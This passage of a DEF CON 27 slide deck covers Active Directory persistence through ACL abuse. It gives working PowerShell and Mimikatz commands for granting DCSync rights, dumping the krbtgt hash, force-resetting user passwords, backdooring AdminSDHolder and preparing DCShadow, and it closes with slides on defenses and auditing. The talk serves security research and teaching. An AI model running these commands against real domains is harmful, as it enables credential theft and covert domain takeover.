  • 38. Persistence DC - Exchange Groups • Use the below command on DC as DA to provide labuser WriteDACL permissions on Exchange Windows Permissions group which, in turn, has WriteDACL permission on the domain object (or even forest root domain object depending on the installation). Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' -SAMAccountName opslabuser -Verbose • Use the below command as labuser to modify ACL on Exchange Windows Permissions and add WriteMember rights to labuser: Set-ADACL -SamAccountName opslabuser -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' -GUIDRight WriteMember -Server powershell.local -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 38
  • 39. Persistence DC - Exchange Groups • With membership of the Exchange Windows Permissions group, labuser has WriteDACL permissions on the domain object. Let's add DCSync permissions. Set-ADACL -SamAccountName opslabuser - DistinguishedName 'DC=powershell,DC=local' -GUIDRight DCSync -Server powershell.local -Verbose • Now we can run DCSync with Mimikatz on the attacker's machine: Invoke-Mimikatz -Command '"lsadump::dcsync /user:pskrbtgt /domain:powershell.local"' Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 39
  • 40. Demo Modify Exchange Group Permissions to compromise forest root Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 40
  • 41. Persistence DC - User object ACL • Another interesting (and well known) persistence technique is to modify permissions on a normal user. • This helps us in using that user as a proxy for the persistence mechanisms we have already discussed. • For example, the permission to Reset Password (User-Force-Change-Password) for a user allows us to, well, reset its password without knowing the current password. Set-ADACL -SamAccountname labuser -TargetSamAccountName support1user -GUIDRight ResetPassword -Verbose • As labuser, run the following command from ActiveDirectory module to reset the password of support1 user at will: Set-ADAccountPassword -Identity support1user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password@123" -Force) -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 41
  • 42. Persistence DC - AdminSDHolder • A well known persistence method is to abuse ACL of AdminSDHolder. • We can modify the ACL of AdminSDHolder to get rights like FullControl, WriteMembers, ResetPassword and more on all Protected Groups. • The best way is to get WriteDACL permissions on AdminSDHolder so that we can modify permissions on demand. Set-DCPermissions -Method AdminSDHolder -SAMAccountName labuser - DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 42
  • 43. Persistence DC - DCSync • Perhaps the most famous ACL abuse! • We can modify the ACL of the domain object to get 'DCSync' rights. Run as DA on DC: Set-DCPermissions -Method DCSync -SAMAccountName labuser -DistinguishedName 'DC=offensiveps,DC=powershell,DC=local' -Verbose • Now we can run DCSync with Mimikatz as labuser: Invoke-Mimikatz -Command '"lsadump::dcsync /user:opskrbtgt"' Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 43
  • 44. Persistence DC - DCShadow • DCShadow allows modification of objects without leaving change logs for the target object. • It registers the attacker's machine temporarily as a domain controller and allows modification of attributes. • The attacker's machine must be part of the forest root to execute this attack. • We can modify permissions of multiple objects in a domain to execute DCShadow without DA privileges. Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 44
  • 45. Persistence DC - DCShadow • DCShadow can be used with minimal permissions by modifying ACLs of - −The domain object. − DS-Install-Replica (Add/Remove Replica in Domain) − DS-Replication-Manage-Topology (Manage Replication Topology) − DS-Replication-Synchronize (Replication Synchornization) −The Sites object (and its children) in the Configuration container. − CreateChild and DeleteChild −The object of the computer which is registered as a DC. − WriteProperty (Not GenericWrite) −The target object. − WriteProperty (Not GenericWrite) Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 45
  • 46. Persistence DC - DCShadow • For example, to allow labuser to modify any attribute of serviceuser from the attacker machine ops-user1: Set-DCShadowPermissions -FakeDC ops-user1 - SAMAccountName serviceuser -Username labuser -Verbose Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 46
  • 47. Summary of attacks ACL modified for Targets DC or Member Machine or Both Can be executed with Resulting privileges PowerShell Remoting Both PowerShell Remoting Normal User permission (Very useful for chaining with other techniques) WMI Both WMI Normal User permission (Very useful for chaining with other techniques) Services Both (Too noisy on DC) RPC, PSRemoting, WMI SYSTEM Registry Autoruns Both (Noisy on DC) Remote Registry, PSRemoting, WMI SYSTEM DCOM Both RPC, PSRemoting, WMI Normal User Permission JEA Both PSRemoting Local Administrator DA on DC (locally) Creds in Registry Both Remote Registry, PSRemoting, WMI Local Administrator DA on DCNikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 47
  • 48. Summary of attacks ACL modified for Targets DC or Member Machine or Both Can be executed with Resulting privileges DNS Server Object DNS Server DNS RSAT SYSTEM DSRM Admin Logon Behaviour DC PSRemoting, WMI or other services DA Resource-based Constrained Delegation Member Machine PSRemoting, WMI or other services Local Administrator Exchange Groups DC or Forest root DC PSRemoting, WMI or other services DA Or DA on forest root User object User -- That of the target user AdminSDHolder DC Remote Registry, PSRemoting, WMI DA DCSync DC Mimikatz (DRS) DA DCShadow Forest root DC Mimikatz (DRS) EA Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 48
  • 49. Previous Work • ACL abuse is not something new, system administrators have been using this for so many years! • We can still see articles from 2001 talking about setting Launch Permissions for DCOM[1], for WMI from 2002[2] and so on. • (French) Chemins de contrôle en environnement Active Directory https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/ • An ACE Up the Sleeve Designing Active Directory DACL Backdoors (DEF CON 25) - https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON %2025%20-%20Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 49
  • 50. Defenses • Events logs are the best bet against the discussed attacks! Other than, of course, protecting your Domain Administraors. • Every technique where we access machine there will be a 4624, 4634 and 4672 in case of admin logon. • Auditing changes to ACLs is also useful: https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced- security-audit-policy-via-ds-access/ • Auditing dangerous ACLs using BloodHound, ADACLScanner and PingCastle is recommended. • Also, see my project Deploy-Deception for tricking an attacker in assuming they found object(s) with misconfigured ACLs :) Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 50
  • 51. Future Work • Service Permissions are stored in Registry. So, that is a place ripe for abuse. • As noted earlier, WMI Permanent Event Consumer needs to be explored more. • For the RACE toolkit, work on hiding the ACE we introduce is highly desirable. Also, implementation of more Registry Autoruns! Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 51
  • 52. Thank You - Questions? • Contact me: @nikhil_mitt nikhil.uitrgpv@gmail.com nikhil@pentesteracademy.com • Slides, code and blog posts will be available on: https://labofapenetrationtester.com/ https://github.com/samratashok/RACE Nikhil Mittal - PentesterAcademy.com DEF CON 27 - RACE for AD Dominance 52

Editor's Notes

  1. Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object
  2. Reference: https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1
  3. Reference - https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1
  4. https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
  5. Reference: https://docs.microsoft.com/en-us/powershell/jea/overview
  6. References: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
  7. https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory
  8. Reference: http://techgenix.com/aquicktiptoallowdsrmaccounttologonnormally/
  9. Reference: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#generic-dacl-abuse
  10. Reference: https://docs.microsoft.com/en-us/windows/win32/adschema/r-user-force-change-password
  11. References: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory https://adsecurity.org/?p=1906
  12. References: https://www.dcshadow.com/ https://www.labofapenetrationtester.com/2018/04/dcshadow.html https://www.labofapenetrationtester.com/2018/05/dcshadow-sacl.html
  13. [1] - http://active-undelete.com/dcom-configuration.htm [2] - https://redmondmag.com/articles/2002/02/01/securing-remote-management-with-wmi.aspx
  14. https://github.com/BloodHoundAD/BloodHound/tree/master https://github.com/canix1/ADACLScanner https://www.pingcastle.com/ https://github.com/samratashok/Deploy-Deception